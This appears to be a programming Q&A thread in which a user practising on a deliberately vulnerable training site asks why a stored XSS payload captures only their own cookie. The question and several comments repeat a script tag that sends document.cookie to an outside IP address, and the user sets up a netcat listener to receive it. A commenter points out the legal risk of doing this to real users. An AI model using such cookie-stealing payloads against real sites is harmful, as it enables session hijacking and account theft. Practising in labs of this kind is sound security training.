# Why am I unable to obtain user cookies from other users XSS

Tags: javascript, xss, session-cookies

I want to better understand XSS so that I can help out my friends who have small businesses protect themselves. So I went online and used one of those Kali Linux practise vulnerable sites to practise XSS.

So I found a stored XSS vulnerability on one of the challenges and well exploited it with the following code: `<script>image = new Image(); image.src='http://192.168.32.15:80/?'+document.cookie;</script>` on the about us page where you can insert a comment.

Then on a Linux terminal, I did `nc -l -p 80` to listen on the traffic - but the only cookie I get is when I CLICK ON THE PAGE. There are another one or two users on the site, and essentially I am trying to get their cookies but don't seem to be getting it on my terminal.

Any help would be appreciated.

Thanks

Comment: Someone else would need to visit the (uncached) page, loading your `<script>` tag. Keep in mind those sites are **simulated**, and likely have additional safeguards. Also, I would definitely check up on the legalities of what you're trying to accomplish... assuming the other two users are scripted it should be OK, though if they're genuine users then it's likely an illegal act. But I'm not a lawyer.

Comment: @ObsidianAge yeah the other two users are automated, I am practicing on their own OWASP/Ethical hacking sites. I would never come here to ask how to illegally do malicious things (even if I did why would I come here). But yeah, im not sure why its not working on the other two automated bots

Comment: How do you inject the script? You need to find a vulnerability in the site that allows you to store the script in a way that it is read and evaluated for every user that visits. This is usually done in some user input field that does not sanitize the input and subsequently renders it directly in the web page.

Comment: @JakeHolzinger sorry what do you mean exactly? I am currently doing it like this: `<script>image = new Image(); image.src='http://192.168.32.15:80/?'+document.cookie;</script>` What would I have to modify here?

Comment: How does the script end up on the web page? Do you open the dev tools and add it manually?

Comment: @JakeHolzinger there is a like a user text area where you can write things. In that big text area, I am injecting `<script>image = new Image(); image.src='http://192.168.32.15:80/?'+document.cookie;</script>`. So like when I visit the page, I can see my cookie so I know the XSS works. It just doesn't work when automated bots are on. Your point on santization sounds interesting. So like what would I have to do?

Comment: When I view the page source it looks like `<p> Latest update </p> <pre> <script>image = new Image(); image.src='http://192.168.32.15:80/?'+document.cookie;</script> </pre>`

Comment: It sounds like the script is being saved in your browser localstorage, not on the server. Assuming you're testing this on a "hack my site" page it's likely this is done to avoid actually hacking other users. Other people that visit the page do not load the script because they are in their own browser context. You need a website that persists the data server side and returns it to all users.

Comment: @JakeHolzinger I see. No the challenge was to steal the cookies and I assumed my script was stored on the server but it clearly wasn't. Now the question is, how do I push it onto the server so I can steal their cookies?